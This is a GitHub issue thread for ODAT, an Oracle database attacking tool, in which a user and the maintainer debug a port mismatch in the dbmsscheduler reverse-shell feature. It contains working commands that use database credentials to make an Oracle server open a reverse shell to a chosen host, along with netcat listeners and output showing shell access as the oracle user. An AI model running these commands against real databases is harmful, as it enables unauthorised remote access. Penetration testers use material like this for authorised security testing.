Reverse shell problem - Githubissues

quentinhardy / odat

ODAT: Oracle Database Attacking Tool

1.62k stars 344 forks source link

Reverse shell problem #12

Closed reversebrain closed 8 years ago

reversebrain commented 8 years ago

First of all thank you for your tool! I noticed a strange problem executing a dmsscheduler module with reverse shell parameter. When odat start listen to a specified port, it doens't match the port written in input after the IP but a random one

quentinhardy commented 8 years ago

Yes. Very strange...

I have just tested the lastest development version and standalone version (v2.0) with the following command on a 12.1.0.2 database:

./odat.py dbmsscheduler  -s 192.168.56.2 -d ORCL -U $user -P $password --reverse-shell 192.168.56.1 65534

I have the following output:

[1] (192.168.56.102:1521): Try to give you a reverse shell from the 192.168.56.2 server
[+] The python reverse shell tries to connect to 192.168.56.1:65534
Listening on [0.0.0.0] (family 0, port 65534)
Connection from [192.168.56.2] port 65534 [tcp/*] accepted (family 2, sport 29247)
sh: no job control in this shell
sh-4.2$ id
id
uid=1000(oracle) gid=1000(oracle) groups=1000(oracle)

Here is the netstat output:

netstat -antp | grep 65534
tcp        0      0 192.168.56.1:65534     192.168.56.2:29247    ESTABLISHED 3654/nc

For me, the reverse shell is established on the 65534 local port (2nd parameter of --reverse-shell). I can't reproduce your problem.

What is the ODAT version you have used for this test ?
Is it the standalone or development version you have used ?
Can I get your command output and netstat output ?

Thank you in advance,

reversebrain commented 8 years ago

I'm using the development version with Oracle Instant Client 11.1. This is my command:

sudo ./odat.py dbmsscheduler -s 127.0.0.1 -p 9000 -d XE -U TESTER1 -P Token_Java_dev_hydrogen1 --reverse-shell 10.10.72.110 443

This is the output:

[1] (127.0.0.1:9000): Try to give you a reverse shell from the 127.0.0.1 server [+] The python reverse shell tries to connect to 10.10.72.110:443 443: inverse host lookup failed: Unknown host listening on [any] 56657 ... [+] The Job is running

I can get the reverse shell only performing this:

sudo nc -lvp 443

In fact this is the output:

listening on [any] 443 ... 192.168.101.7: inverse host lookup failed: Unknown host connect to [10.10.72.110] from (UNKNOWN) [192.168.101.7] 50991 sh: no job control in this shell sh-4.1$

quentinhardy commented 8 years ago

The following commit should fix this issue: 1fb920e0ad56a36f8d1ca40a642225a273779895 Can you confirm ?

reversebrain commented 8 years ago

Yes, I think that the problem is -p parameter which specify the port to use.

EDIT: Yes, now it works, I retried to perform the same commands and now it is listening on the correct port. Thank you

quentinhardy commented 8 years ago

Your welcome. Thank you to you for this bug report.